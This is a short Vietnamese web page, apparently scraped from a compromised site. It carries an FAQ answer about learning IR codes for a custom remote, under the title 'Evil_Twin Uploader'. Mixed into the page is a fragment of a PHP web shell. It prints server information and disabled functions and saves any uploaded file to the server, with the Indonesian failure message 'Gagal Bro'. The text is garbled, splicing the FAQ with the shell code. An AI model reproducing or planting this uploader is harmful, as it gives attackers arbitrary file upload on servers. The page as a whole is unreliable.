Evil_Twin Uploader

Làm thế nào khi thiết bị của tôi không có trong danh sách thương hiệu?

Bạn vui lòng thêm một điều khiển từ xa tùy chỉnh, thêm nút bạn cần điều khiển và tìm hiểu mã IR cho thiết bị học từng câu lệnh điều khiển một.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial